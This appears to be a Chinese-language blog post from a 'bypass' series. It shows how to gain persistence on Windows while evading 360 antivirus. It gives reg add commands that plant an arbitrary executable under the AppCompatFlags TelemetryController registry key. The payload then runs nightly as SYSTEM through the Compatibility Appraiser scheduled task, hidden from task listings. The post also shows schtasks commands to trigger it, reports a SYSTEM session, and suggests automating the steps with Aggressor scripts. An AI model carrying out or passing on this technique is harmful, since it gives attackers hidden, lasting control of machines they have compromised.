bypass系列-bypass360实现持久化控制

白色键盘 2.2K 0

前置条件

影响版本:win7/windows2008R2/windows2019/windows10

需要权限:本地管理员权限、HKLM权限

截至本文发布时,此持久性技术需要安装本地管理员权限(要求具有写入HKLM的能力),写入之后每夜执行一次,并且在计划任务中不可见。

bypass添加注册表命令

添加启动程序路径

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\bypass" /v Command /t reg_sz /d C:\xxx\xxx.exe

添加启动时效

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\bypass" /v Nightly /t reg_dword /d 1

实测

测试正常注册表写入启动项,360拦截

bypass系列-bypass360实现持久化控制

bypass系列-bypass360实现持久化控制

写入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\

创建DWORD 值为1

360不拦截
bypass系列-bypass360实现持久化控制

查看注册表

bypass系列-bypass360实现持久化控制

查询系统推送定时任务schtasks /query /v /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"

 

bypass系列-bypass360实现持久化控制

下次运行时间为0:43

bypass系列-bypass360实现持久化控制

手动执行定时任务

schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"

bypass系列-bypass360实现持久化控制

获得一个system权限的会话

bypass系列-bypass360实现持久化控制

可以通过AggressorScripts编写注册表写入,达到一键化持续控制

发表评论 取消回复
表情 图片 链接 代码

分享